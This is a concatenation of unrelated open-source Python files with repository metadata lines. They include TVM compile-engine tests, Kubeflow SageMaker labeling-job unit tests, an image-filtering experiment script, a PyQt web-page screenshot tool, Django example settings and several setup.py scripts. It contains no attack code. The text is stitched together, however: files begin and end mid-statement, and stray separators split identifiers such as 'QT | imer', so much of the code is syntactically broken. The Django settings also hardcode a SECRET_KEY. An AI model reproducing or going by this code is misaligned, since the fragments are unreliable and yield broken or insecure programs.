impls = _get_impls((1, 16, 7, 7), (32, 16, 3, 3))
assert len(impls) == 3
def test_select_implementation():
target = tvm.target.Target("llvm")
def _select_impl(dshape, wshape, use_autotvm=False):
data = relay.var("data", shape=dshape)
weight = relay.var("wshape", shape=wshape)
out = relay.nn.conv2d(data, weight, padding=(1, 1))
out = run_infer_type(out)
return relay.backend.compile_engine.select_implementation(
relay.op.get("nn.conv2d"),
out.attrs,
[te.placeholder(dshape), te.placeholder(wshape)],
out.checked_type,
target,
use_autotvm,
)
with TempOpAttr("nn.conv2d", "FTVMStrategy", _tmp_strategy):
impl, _ = _select_impl((1, 8, 7, 7), (32, 8, 3, 3))
assert impl.name == "conv2d_2"
impl, _ = _select_impl((1, 8, 7, 7), (32, 8, 3, 3), True)
assert impl.name == "conv2d_2"
impl, _ = _select_impl((1, 16, 7, 7), (32, 16, 3, 3))
assert impl.name == "conv2d_3"
impl, _ = _select_impl((1, 16, 7, 7), (32, 16, 3, 3), True)
assert impl.name == "conv2d_3"
# add autotvm record
records = []
records.append(_create_record("test/conv2d_1", (1, 8, 7, 7), (32, 8, 3, 3), target, 0.5))
records.append(_create_record("test/conv2d_1", (1, 16, 7, 7), (32, 16, 3, 3), target, 1.0))
with target:
with autotvm.apply_history_best(records):
impl, _ = _select_impl((1, 8, 7, 7), (32, 8, 3, 3), True)
assert impl.name == "conv2d_1"
impl, _ = _select_impl((1, 16, 7, 7), (32, 16, 3, 3), True)
assert impl.name == "conv2d_1"
records.append(_create_record("test/conv2d_2", (1, 8, 7, 7), (32, 8, 3, 3), target, 0.2))
records.append(_create_record("test/conv2d_1", (1, 16, 7, 7), (32, 16, 3, 3), target, 1.2))
with target:
with autotvm.apply_history_best(records):
impl, _ = _select_impl((1, 8, 7, 7), (32, 8, 3, 3), True)
assert impl.name == "conv2d_2"
impl, _ = _select_impl((1, 16, 7, 7), (32, 16, 3, 3), True)
assert impl.name == "conv2d_1"
def test_compile_engine():
engine = relay.backend.compile_engine.get()
def get_func(shape):
x = relay.var("x", shape=shape)
y = relay.add(x, x)
z = relay.add(y, x)
f = relay.Function([x], z)
mod = tvm.IRModule.from_expr(f)
mod = relay.transform.InferType()(mod)
return mod["main"]
z1 = engine.lower(get_func((10,)), "llvm")
z2 = engine.lower(get_func((10,)), "llvm")
z3 = engine.lower(get_func(()), "llvm")
assert z1.same_as(z2)
assert not z3.same_as(z1)
if tvm.testing.device_enabled("cuda"):
z4 = engine.lower(get_func(()), "cuda")
assert not z3.same_as(z4)
# Test JIT target
for target in ["llvm"]:
ctx = tvm.context(target)
if tvm.testing.device_enabled(target):
f = engine.jit(get_func((10,)), target)
x = tvm.nd.array(np.ones(10).astype("float32"), ctx=ctx)
y = tvm.nd.empty((10,), ctx=ctx)
f(x, y)
tvm.testing.assert_allclose(y.asnumpy(), x.asnumpy() * 3)
engine.dump()
def test_compile_placeholder_bypass():
engine = relay.backend.compile_engine.get()
x = relay.var("x", shape=(2, 3))
y = relay.var("y", shape=(2, 3))
z = relay.var("z", shape=(2, 3))
result = relay.Tuple([x, relay.op.concatenate([y, z], axis=0)])
func = relay.Function(relay.analysis.free_vars(result), result)
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(tvm.IRModule.from_expr(func), "llvm")
def test_compile_injective_with_tuple():
x = relay.var("x", shape=(2, 3))
y = relay.var("y", shape=(2, 3))
x_transpose = relay.transpose(x)
output = relay.Tuple([x_transpose, y])
func = relay.Function([x, y], output)
relay.build(tvm.IRModule.from_expr(func), "l |
kubeflow/pipelines | components/aws/sagemaker/tests/unit_tests/tests/ground_truth/test_ground_truth_component.py | Python | apache-2.0 | 8,622 | 0.00116 | from common.sagemaker_component import SageMakerJobStatus
from ground_truth.src.sagemaker_ground_truth_spec import SageMakerGroundTruthSpec
from ground_truth.src.sagemaker_ground_truth_component import (
SageMakerGroundTruthComponent,
)
from tests.unit_tests.tests.ground_truth.test_ground_truth_spec import (
GroundTruthSpecTestCase,
)
import unittest
from unittest.mock import patch, MagicMock, ANY
class GroundTruthComponentTestCase(unittest.TestCase):
REQUIRED_ARGS = GroundTruthSpecTestCase.REQUIRED_ARGS
@classmethod
def setUp(cls):
cls.component = SageMakerGroundTruthComponent()
# Instantiate without calling Do()
cls.component._labeling_job_name = "my-labeling-job"
@patch("ground_truth.src.sagemaker_ground_truth_component.super", MagicMock())
def test_do_sets_name(self):
named_spec = SageMakerGroundTruthSpec(
self.REQUIRED_ARGS + ["--job_name", "test-job"]
)
unnamed_spec = SageMakerGroundTruthSpec(self.REQUIRED_ARGS)
self.component.Do(named_spec)
self.assertEqual("test-job", self.component._labeling_job_name)
with patch(
"ground_truth.src.sagemaker_ground_truth_component.SageMakerComponent._generate_unique_timestamped_id",
MagicMock(return_value="unique"),
):
self.component.Do(unnamed_spec)
self.assertEqual("unique", self.component._labeling_job_name)
def test_create_ground_truth_job(self):
spec = SageMakerGroundTruthSpec(self.REQUIRED_ARGS)
request = self.component._create_job_request(spec.inputs, spec.outputs)
self.assertEqual(
request,
{
"LabelingJobName": "my-labeling-job",
"LabelAttributeName": None,
"InputConfig": {
"DataSource": {
"S3DataSource": {"ManifestS3Uri": "s3://fake-bucket/manifest"}
}
},
"OutputConfig": {
"S3OutputPath": "s3://fake-bucket/output",
"KmsKeyId": "",
},
"RoleArn": "arn:aws:iam::123456789012:user/Development/product_1234/*",
"HumanTaskConfig": {
"WorkteamArn": None,
"UiConfig": {"UiTemplateS3Uri": "s3://fake-bucket/ui_template"},
"PreHumanTaskLambdaArn": "",
"TaskTitle": "fake-image-labelling-work",
"TaskDescription": "fake job",
"NumberOfHumanWorkersPerDataObject": 1,
"TaskTimeLimitInSeconds": 180,
"AnnotationConsolidationConfig": {
"AnnotationConsolidationLambdaArn": ""
},
},
"Tags": [],
},
)
def test_create_ground_truth_job_all_args(self):
spec = SageMakerGroundTruthSpec(
self.REQUIRED_ARGS
+ [
"--label_attribute_name",
"fake-attribute",
"--max_human_labeled_objects",
"10",
"--max_percent_objects",
"50",
"--enable_auto_labeling",
"True",
"--initial_model_arn",
"fake-model-arn",
"--task_availibility",
"30",
"--max_concurrent_tasks",
"10",
"--task_keywords",
"fake-keyword",
"--worker_type",
"public",
"--no_adult_content",
"True",
"--no_ppi",
"True",
"--tags",
'{"fake_key": "fake_value"}',
]
)
request = self.component._create_job_request(spec.inputs, spec.outputs)
self.assertEqual(
request,
{
"LabelingJobName": "my-labeling-job",
"LabelAttributeName": "fake-attribute",
"InputConfig": {
"DataSource": {
"S3DataSource": {"ManifestS3Uri": "s3://fake-bucket/manifest"}
},
"DataAttributes": {
"ContentClassifiers": [
"FreeOfAdultContent",
"FreeOfPersonallyIdentifiableInformation",
]
},
},
"OutputConfig": {
"S3OutputPath": "s3://fake-bucket/output",
"KmsKeyId": "",
},
"RoleArn": "arn:aws:iam::123456789012:user/Development/product_1234/*",
"StoppingConditions": {
"MaxHumanLabeledObjectCount": 10,
"MaxPercentageOfInputDatasetLabeled": 50,
},
"LabelingJobAlgorithmsConfig": {
"LabelingJobAlgorithmSpecificationArn": "",
"InitialActiveLearningModelArn": "",
"LabelingJobResourceConfig": {"VolumeKmsKeyId": ""},
},
"HumanTaskConfig": {
"WorkteamArn": "arn:aws:sagemaker:us-west-2:394669845002:workteam/public-crowd/default",
"UiConfig": {"UiTemplateS3Uri": "s3://fake-bucket/ui_template"},
"PreHumanTaskLambdaArn": "",
"TaskKeywords": ["fake-keyword"],
"TaskTitle": "fake-image-labelling-work",
"TaskDescription": "fake job",
"NumberOfHuma | nWorkersPerDataObject": 1,
"TaskTimeLimitInSeconds": 180,
"TaskAvailabilityLifetimeInSeconds": 30,
"MaxConcurrentTaskCount": 10,
| "AnnotationConsolidationConfig": {
"AnnotationConsolidationLambdaArn": ""
},
"PublicWorkforceTaskPrice": {
"AmountInUsd": {
"Dollars": 0,
"Cents": 0,
"TenthFractionsOfACent": 0,
}
},
},
"Tags": [{"Key": "fake_key", "Value": "fake_value"}],
},
)
def test_get_job_status(self):
self.component._sm_client = MagicMock()
self.component._sm_client.describe_labeling_job.return_value = {
"LabelingJobStatus": "Starting"
}
self.assertEqual(
self.component._get_job_status(),
SageMakerJobStatus(is_completed=False, raw_status="Starting"),
)
self.component._sm_client.describe_labeling_job.return_value = {
"LabelingJobStatus": "Completed"
}
self.assertEqual(
self.component._get_job_status(),
SageMakerJobStatus(is_completed=True, raw_status="Completed"),
)
self.component._sm_client.describe_labeling_job.return_value = {
"LabelingJobStatus": "Failed",
"FailureReason": "lolidk",
}
self.assertEqual(
self.component._get_job_status(),
SageMakerJobStatus(
is_completed=True,
raw_status="Failed",
has_error=True,
error_message="lolidk",
),
)
def test_after_job_completed(self):
spec = SageMakerGroundTruthSpec(self.REQUIRED_ARGS)
auto_labeling_spec = SageMakerGroundTruthSpec(
self.REQUIRED_ARGS + ["--enable_auto_labeling", "True"]
)
self.component._sm_client = mock_client = MagicMock()
mock_client.describe_labeling_job.return_value = {
"LabelingJobOutput": {
"OutputDatasetS3Uri": "s3://path/",
"FinalActiveLearningModelArn": "model-arn",
}
}
self.component._after_job_complete({}, {}, spec.inputs, spec.outputs)
self.assertEqual(spec.outputs.active_learning_model_arn |
facundoq/ipim | tp1/py/tp.py | Python | gpl-3.0 | 10,677 | 0.013206 | from pylab import *
from math import exp, sqrt
from image import *
from filters import *
from nibabel import load
import numpy
import image_processing
import image as img
import os
# This module generates
class C:
#a Config class, just a collection of constants
output_dir = '../report/img/results/'
input_dir = '../report/img/input/'
output_dir_plots = '../report/img/plots/'
# algorithm parameters to generate Sim and Reg plots
noise_levels = [0, 0.25, 0.5,1,2,3,5] # noise levels to distort the images
gaussian_sigmas = [0.5,1,2]
bilateral_sigmaDs = [0.5,1,2]
bilateral_sigmaRs = [2,20]
# plot configuration variables
column_names=['sim','reg','e','noise']
colors=['g','r','c','m','y','b'] # for different sigmaD
markers=['<','>','v','^'] # for different sigmaR
lines=['-',''] # for different typtes of algorithms
# algorithm parameters to generate result images
default_noise_level = 1.5
default_noise_level_mri = 1.5
default_gaussian_sigma = 1
default_gaussian_sigma_noise = 1.5
default_bilateral_sigma = (1, 7)
default_bilateral_sigma_noise = (1.5, 7)
default_number_of_bins = 256
# generate the plot for filtering algorithms
def generate_plot_filtering(results,name,column_y):
xlabel('Noise ($\sigma$)')
for sigma in C.gaussian_sigmas:
gaussian = results['gaussian']
gaussian = gaussian[gaussian[:, 4] == sigma]
label = 'Gaussian, $\sigma=%.2f$' % sigma
style='o'+C.colors[C.gaussian_sigmas.index(sigma)]+'--'
plot(gaussian[:, 3], gaussian[:, column_y], style,label=label)
legend(loc=2)
for sigmaD in C.bilateral_sigmaDs:
for sigmaR in C.bilateral_sigmaRs:
| bilateral= results['bilateral']
bilateral = bilateral[bilateral[:, 4] == sigmaD]
bilateral = bilateral[bilateral[: | , 5] == sigmaR]
label = 'Bilateral, $\sigma_d=%.2f$, $\sigma_r=%.2f$' % (sigmaD,sigmaR)
style=C.markers[C.bilateral_sigmaRs.index(sigmaR)]+C.colors[C.bilateral_sigmaDs.index(sigmaD)]+'-'
plot(bilateral[:, 3], bilateral[:, column_y],style,label=label )
legend(loc=2)
savepngfig(C.output_dir_plots+name+'_filtering_'+C.column_names[column_y])
# generate the plot for otsu's algorithm, with and without noise and different
# types of filters
def generate_plot_otsu(results,name,column_y):
xlabel('Noise ($\sigma$)')
otsu = results['otsu']
plot(otsu[:, 3], otsu[:, column_y],'-.', label='otsu')
legend(loc=2)
for sigma in C.gaussian_sigmas:
otsu = results['otsu_gaussian']
otsu = otsu[otsu[:, 4] == sigma]
label = 'Otsu with gaussian, $\sigma=%.2f$' % sigma
style='o'+C.colors[C.gaussian_sigmas.index(sigma)]+'--'
plot(otsu[:, 3], otsu[:, column_y], style,label=label)
legend(loc=1)
for sigmaD in C.bilateral_sigmaDs:
for sigmaR in C.bilateral_sigmaRs:
otsu = results['otsu_bilateral']
otsu = otsu[otsu[:, 4] == sigmaD]
otsu = otsu[otsu[:, 5] == sigmaR]
label = 'Otsu with bilateral, $\sigma_d=%.2f$, $\sigma_r=%.2f$' % (sigmaD,sigmaR)
style=C.markers[C.bilateral_sigmaRs.index(sigmaR)]+C.colors[C.bilateral_sigmaDs.index(sigmaD)]+'-'
plot(otsu[:, 3], otsu[:, column_y],style, label=label)
legend(loc=1)
savepngfig(C.output_dir_plots+name+'_otsu_'+C.column_names[column_y])
# Generate all the plot images according to the results dictionary
# for image with given name
def generate_plot_images(results, name):
for k in results:
results[k] = array(results[k])
functions=[generate_plot_otsu,generate_plot_filtering]
labels=[(0,'$Sim(I,J)$'),(1,'$Reg(J)$')]
for f in functions:
for (column_y,label) in labels:
figure()
ylabel(label)
f(results,name,column_y)
xlim(0,C.noise_levels[-1]*1.5)
# generate a dictionary with Sim, Reg and E values for every combination of the
# algorithm parameters in class C, for a given image with a certain name
def generate_plots(image, name):
results = {}
results['otsu'] = []
results['otsu_bilateral'] = []
results['otsu_gaussian'] = []
results['bilateral'] = []
results['gaussian'] = []
otsu, t = image_processing.threshold_otsu(image, C.default_number_of_bins)
for noise in C.noise_levels:
print 'Image %s, Noise %.2f ' % (name, noise)
image_with_noise = add_gaussian_noise(image, noise)
print 'Image %s, otsu ' % (name)
otsu_noise, t = image_processing.threshold_otsu(image_with_noise, C.default_number_of_bins)
s, r, e = transformation_energy(otsu, otsu_noise)
results['otsu'].append([s, r, e, noise])
for sigma in C.gaussian_sigmas:
print 'Image %s, gaussian s=%.2f ' % (name, sigma)
gaussian = gaussian_filter(image_with_noise, sigma)
s, r, e = transformation_energy(image, gaussian)
results['gaussian'].append([s, r, e, noise, sigma])
if (sigma<2):
otsu_gaussian, t = image_processing.threshold_otsu(gaussian, C.default_number_of_bins)
s, r, e = transformation_energy(otsu, otsu_gaussian)
results['otsu_gaussian'].append([s, r, e, noise, sigma])
for sigmaD in C.bilateral_sigmaDs:
for sigmaR in C.bilateral_sigmaRs:
print 'Image %s, bilateral sd=%.2f, sr=%.2f ' % (name, sigmaD,sigmaR)
bilateral = bilateral_filter(image_with_noise, sigmaD, sigmaR)
s, r, e = transformation_energy(image, bilateral)
results['bilateral'].append([s, r, e, noise, sigmaD, sigmaR])
otsu_bilateral, t = image_processing.threshold_otsu(bilateral, C.default_number_of_bins)
s, r, e = transformation_energy(otsu, otsu_bilateral)
results['otsu_bilateral'].append([s, r, e, noise, sigmaD, sigmaR])
print 'Generating plot images...'
generate_plot_images(results, name)
# Generate the images that will be visually inspected
# For the given image, calculate:
# 1) Bilateral, gaussian and otsu's without noise
# 2) Bilateral, gaussian and otsu's with noise
# 3) Otsu's with noise, but after applying Bilateral, gaussian filtering
# Result images are saved with the given name as a prefix
def generate_result_images(image, name):
image = add_gaussian_noise(image, 0)
print 'Processing image %s' % name
save_image_png(image, C.output_dir + name)
if (name.startswith('mri')):
noise = C.default_noise_level_mri
else:
noise = C.default_noise_level
image_with_default_noise = add_gaussian_noise(image, noise)
save_image_png(image_with_default_noise, C.output_dir + name + '_noise')
print 'Image %s: bilateral' % name
(sigmaD, sigmaR) = C.default_bilateral_sigma
bilateral = bilateral_filter(image, sigmaD, sigmaR)
save_image_png(bilateral, C.output_dir + name + '_bilateral')
## for sigmaR in [1,2,3,4,5,7,8,9,10,11,12,13,14,15,17,18]:
## bilateral = bilateral_filter(image, sigmaD, sigmaR)
## if (sigmaR<10):
## n='0'+str(sigmaR)
## else:
## n=str(sigmaR)
## save_image_png(bilateral, C.output_dir + name + '_bilateral_'+n)
print 'Image %s: bilateral noise' % name
(sigmaD, sigmaR) = C.default_bilateral_sigma_noise
bilateral_noise = bilateral_filter(image_with_default_noise, sigmaD, sigmaR)
save_image_png(bilateral_noise, C.output_dir + name + '_noise_bilateral')
print 'Image %s: gaussian' % name
sigma = C.default_gaussian_sigma
gaussian = gaussian_filter(image, sigma)
save_image_png(gaussian, C.output_dir + name + '_gaussian')
print 'Image %s: gaussian noise' % name
sigma = C.default_gaussian_sigma_noise
gaussian_noise = gaussian_filter(image_with_default_noise, sigma)
save_image_png(gaussian_noise, C.output_dir + name + '_noise_gaussian')
print 'Image %s: Otsu' % name
otsu, t = image_processing.threshold_otsu(image, C.default_number_of_bins)
save_image_png(otsu, C.output_dir + name |
jasonhejna/raspberrytraffic | makeimage.py | Python | mit | 1,014 | 0.016765 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class browser(QWebView):
def __init__(self, parent=None):
super(browser, self).__init__(parent)
self.setFixedSize(1920, 1080)
self.timerScreen = QT | imer()
| self.timerScreen.setInterval(17000)
self.timerScreen.setSingleShot(True)
self.timerScreen.timeout.connect(self.takeScreenshot)
self.loadFinished.connect(self.timerScreen.start)
self.load(QUrl("file:///home/pi/index1.html"))
def takeScreenshot(self):
image = QImage(self.page().mainFrame().contentsSize(), QImage.Format_ARGB32)
painter = QPainter(image)
self.page().mainFrame().render(painter)
painter.end()
# image.save(self.title() + ".png")
image.save("webimage.png")
sys.exit()
if __name__ == "__main__":
import sys
app = QApplication(sys.argv)
main = browser()
app.exec_()
|
saurabhkumar1989/programming_question_python | questions/integer_number.py | Python | apache-2.0 | 58 | 0.068966 |
a = 1224
while a:
| temp = a%10
print temp
a = a//10
| |
istinspring/imscrape-template | api.py | Python | mit | 143 | 0 | from utils.api_factory import ApiFac | tory
api = ApiFactory.get_instance()
if __name__ == '__main__':
api.run(host='0.0. | 0.0', port=8000)
|
mjumbewu/django-model-filters | example_project/settings.py | Python | bsd-3-clause | 5,060 | 0.002174 | # Django settings for example project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'example_project.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# althoug | h not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices | can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 's6a32pk==8#0lfor)s69^fcnl)6znc3poy3sa%2j$-o$rouny1'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'example_project.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django_nose',
'south',
'model_filters',
'pepulator_factory',
)
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
michaelorr/helga-spook | setup.py | Python | gpl-3.0 | 1,038 | 0.004817 | from setuptools import setup, find_packages
from helga_spook import __version | __ as version
setup(name='helga-spook',
version=version,
description=('prints nsa buzzwords'),
classifiers=['Development Status :: 4 - Beta',
'License :: OSI Approved :: GNU General | Public License v3 (GPLv3)',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Communications :: Chat :: Internet Relay Chat'],
keywords='irc bot nsa spook emacs',
author='Michael Orr',
author_email='michael@orr.co',
url='https://github.com/michaelorr/helga-spook',
license='LICENSE',
packages=find_packages(),
include_package_data=True,
py_modules=['helga_spook.plugin'],
zip_safe=True,
entry_points = dict(
helga_plugins=[
'spook = helga_spook.plugin:spook',
],
),
)
|
CIGIHub/django-icontact-integration | setup.py | Python | gpl-2.0 | 1,167 | 0 | import os
from setuptools import setup
from setuptools import find_packages
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='icontact-integration',
version='0.2.2',
packages=find_packages(),
include_package_data=True,
license='GPL v2',
description='iContact Integration.',
long_description=README,
author='Caroline Simpson',
author_email='csimpson@cigionline.org',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License | ',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic | Content',
],
)
|
dlintott/gns3-ppa | setup.py | Python | gpl-2.0 | 14,696 | 0.010207 | #!/usr/bin/env python
# vim: expandtab ts=4 sw=4 sts=4 fileencoding=utf-8:
"""Setup script for the GNS3 packages."""
import sys, os, shutil, platform
sys.path.append('./src')
from distutils.core import setup, Extension
from glob import glob
# current version of GNS3
VERSION = "0.8.6"
try:
# delete previous build
if os.access('./build', os.F_OK):
shutil.rmtree('./build')
if os.access('./dist', os.F_OK):
shutil.rmtree('./dist')
except:
pass
if sys.platform.startswith('win'):
import struct
bitness = struct.calcsize("P") * 8
# Set the path to Qt plugins directory
if bitness == 32:
# for 32-bit python
PYQT4_DIR = r'C:\Python27-32bit\Lib\site-packages\PyQt4'
elif bitness == 64:
# for 64-bit python
PYQT4_DIR = r'C:\Python27-64bit\Lib\site-packages\PyQt4'
else:
# should seriously not happen ...
print "Fatal error: bitness cannot be detected!"
sys.exit(1)
try:
import py2exe
except ImportError:
raise RuntimeError, "Cannot import py2exe"
data_files = [("Langs", glob(r'src\GNS3\Langs\*.qm')),
('src\GNS3\Dynagen\configspec'),
('COPYING'),
('baseconfig.txt'),
('baseconfig_sw.txt'),
(PYQT4_DIR + r'\QtXml4.dll'),
("iconengines", glob(PYQT4_DIR + r'\plugins\iconengines\*.dll')),
("imageformats", glob(PYQT4_DIR + r'\plugins\imageformats\*.dll'))]
# Settings for py2exe, packages values are to tell to py2exe about hidden imports
setup(windows=[{"script":"gns3.pyw",
"icon_resources": [(1, r'..\gns3_icon.ico')]}],
zipfile=None,
data_files=data_files,
options={"py2exe":
{
"includes": ["sip"],
"dll_excludes": ["MSVCP90.dll", "POWRPROF.dll", "MSWSOCK.dll"],
"optimize": 1,
# CLSID for VirtualBox COM (http://www.py2exe.org/index.cgi/IncludingTypelibs)
# Do not need this anymore because the typelib wrapper is dynamically generated.
#"typelibs": [('{46137EEC-703B-4FE5-AFD4-7C9BBBBA0259}',0,1,3)], #
"packages": ["GNS3.Ui.ConfigurationPages.Page_ATMSW",
"GNS3.Ui.ConfigurationPages.Page_ATMBR",
"GNS3.Ui.ConfigurationPages.Page_Cloud",
"GNS3.Ui.ConfigurationPages.Page_ETHSW",
"GNS3.Ui.ConfigurationPages.Page_Hub",
"GNS3.Ui.ConfigurationPages.Page_FRSW",
"GNS3.Ui.ConfigurationPages.Page_IOSRouter",
"GNS3.Ui.ConfigurationPages.Page_P | IX",
"GNS3.Ui.ConfigurationPages.Page_ASA",
"GNS3.Ui.ConfigurationPages.Page_AWP",
"GNS3.Ui.ConfigurationPages.Page_JunOS",
"GNS3.Ui.ConfigurationPa | ges.Page_IDS",
"GNS3.Ui.ConfigurationPages.Page_Qemu",
"GNS3.Ui.ConfigurationPages.Page_VirtualBox",
"GNS3.Ui.ConfigurationPages.Page_DecorativeNode",
"GNS3.Ui.ConfigurationPages.Page_PreferencesDynamips",
"GNS3.Ui.ConfigurationPages.Page_PreferencesGeneral",
"GNS3.Ui.ConfigurationPages.Page_PreferencesCapture",
"GNS3.Ui.ConfigurationPages.Page_PreferencesQemu",
"GNS3.Ui.ConfigurationPages.Page_PreferencesVirtualBox",
"GNS3.Ui.ConfigurationPages.Page_PreferencesDeployementWizard",
]
}
}
)
# Compile qemuwrapper
sys.path.append('./qemuwrapper')
setup(console=['qemuwrapper/qemuwrapper.py'], options = {"py2exe": {"dll_excludes": ["POWRPROF.dll", "MSWSOCK.dll"]}}, zipfile=None)
# Compile vboxwrapper
sys.path.append('./vboxwrapper')
setup(console=['vboxwrapper/vboxwrapper.py'], options = {"py2exe": {"dll_excludes": ["POWRPROF.dll", "MSWSOCK.dll"]}}, zipfile=None)
elif sys.platform.startswith('darwin'):
import setuptools
QTDIR = r'/Developer/Applications/Qt'
data_files = [('', glob(r'src/GNS3/Langs/*.qm')),
('src/GNS3/Dynagen/configspec'),
('qemuwrapper/qemuwrapper.py'),
# ('vboxwrapper/vboxwrapper.py'),
# ('vboxwrapper/vboxcontroller_4_1.py'),
# ('vboxwrapper/tcp_pipe_proxy.py'),
('baseconfig.txt'),
('baseconfig_sw.txt'),
('COPYING'),
("../PlugIns/iconengines", [QTDIR + r'/plugins/iconengines/libqsvgicon.dylib']),
("../PlugIns/imageformats", [QTDIR + r'/plugins/imageformats/libqgif.dylib',
QTDIR + r'/plugins/imageformats/libqjpeg.dylib',
QTDIR + r'/plugins/imageformats/libqsvg.dylib'])
]
APP = ['gns3.pyw']
OPTIONS = {'argv_emulation': False,
'semi_standalone': True,
'site_packages': True,
'optimize': 1,
'iconfile': 'gns3.icns',
'includes': ['sip',
'PyQt4.QtCore',
'PyQt4.QtGui',
'PyQt4.QtSvg',
'PyQt4.QtXml',
'PyQt4.QtNetwork',
'PyQt4.QtWebKit',
'GNS3.Ui.ConfigurationPages.Page_ATMSW',
'GNS3.Ui.ConfigurationPages.Page_ATMBR',
'GNS3.Ui.ConfigurationPages.Page_Cloud',
'GNS3.Ui.ConfigurationPages.Page_ETHSW',
'GNS3.Ui.ConfigurationPages.Page_Hub',
'GNS3.Ui.ConfigurationPages.Page_FRSW',
'GNS3.Ui.ConfigurationPages.Page_IOSRouter',
'GNS3.Ui.ConfigurationPages.Page_PIX',
'GNS3.Ui.ConfigurationPages.Page_ASA',
'GNS3.Ui.ConfigurationPages.Page_AWP',
'GNS3.Ui.ConfigurationPages.Page_JunOS',
'GNS3.Ui.ConfigurationPages.Page_IDS',
'GNS3.Ui.ConfigurationPages.Page_Qemu',
'GNS3.Ui.ConfigurationPages.Page_VirtualBox',
'GNS3.Ui.ConfigurationPages.Page_DecorativeNode',
'GNS3.Ui.ConfigurationPages.Page_PreferencesDynamips',
'GNS3.Ui.ConfigurationPages.Page_PreferencesGeneral',
'GNS3.Ui.ConfigurationPages.Page_PreferencesCapture',
'GNS3.Ui.ConfigurationPages.Page_PreferencesQemu',
'GNS3.Ui.ConfigurationPages.Page_PreferencesVirtualBox',
'GNS3.Ui.ConfigurationPages.Page_PreferencesDeployementWizard',
],
'plist' : { 'CFBundleName': 'GNS3',
'CFBundleDisplayName': 'GNS3',
'CFBundleGetInfoString' : 'GNS3, Graphical Network Sim |
pywbem/pywbemtools | tests/unit/pywbemcli/test_connection_repository.py | Python | apache-2.0 | 32,125 | 0.000062 | # -*- coding: utf-8 -*-
# (C) Copyright 2020 IBM Corp.
# (C) Copyright 2020 Inova Development Inc.
# All Rights Reserved
#
